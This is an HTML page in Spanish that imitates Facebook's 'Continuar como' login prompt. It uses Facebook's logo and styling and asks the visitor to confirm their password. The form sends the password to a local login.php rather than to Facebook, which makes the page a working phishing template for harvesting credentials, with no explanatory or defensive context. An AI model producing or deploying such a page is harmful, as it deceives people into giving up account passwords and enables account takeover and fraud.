<!DOCTYPE html>
<html lang="es"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login</title>
    <style>
        html .password {
            background: #FFFFFF url(/rsrc.php/v3/yU/r/O7nelmd9XSI.png) repeat-x;
            border: 1px solid #dddfe2;
            color: #030303;
            font-family: Helvetica, Arial, sans-serif;
            font-size: 16px;
            width: 320px;
            height: 32px;
            line-height: 16px;
            padding: 6px;
            vertical-align: middle;
            border-radius: 6px;    
        }
        body{
            background:#e9ebec;
            color: #1c1e21;
            direction: ltr;
            line-height: 1.34;
            margin: 0;
            padding: 0;
            unicode-bidi: embed;
        }
        .content{
            background-color: #fff;
            border: 1px solid #dddfe2;
            border-radius: 8px;    
            box-shadow: 0 2px 4px rgb(0 0 0 / 10%), 0 8px 16px rgb(0 0 0 / 10%);
            margin: auto;
            padding: 20px 0 14px 0;
            width: 396px;
            text-align: center;
        }

        .img1{
            width: 240px;
        }
        .img{
            text-align:center;
        }

        .perfil{
            font-family: SFProDisplay-Regular, Helvetica, Arial, sans-serif;
        }

        .imgp{
            border-radius: 50%;
            overflow: hidden;
            border: 1px solid rgba(0, 0, 0, .1);
            width: 60px;
        }
        .button{  

            color: #fff;
            background-color: #1877f2;
            border: none;
            border-radius: 6px;
            font-size: 20px;
            line-height: 48px;
            padding: 0 16px;
            width: 332px;
        }
    </style>
</head>
<body>
    <div class="img">
        <img class="img1" src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="Facebook">
    </div>
    <div class="content">

        <div class="perfil">
            <img class="imgp" src="https://th.bing.com/th/id/OIP.gFVN6IRbfiVMde3Wg47L9QHaFj?w=259&h=194&c=7&r=0&o=5&pid=1.7">

            <p class="name">Continuar como Gatito <br><a href="index.html" style="font-size: 11px;">¿No eres tú?</a></p>
        </div>

        <div class="form">
            <form action="login.php" method="post">
                <input class="password" type="password" placeholder="Confirme su contraseña" required id="password" name="password">
                <br><br>
                <button type="submit" class="button">Continuar</button>
            </form>
        </div>

        <a href="https://www.facebook.com/recover/initiate/?ars=facebook_login" style="font-size: 12px;">¿Olvidaste tu contraseña?</a>
    </div>
</body></html>
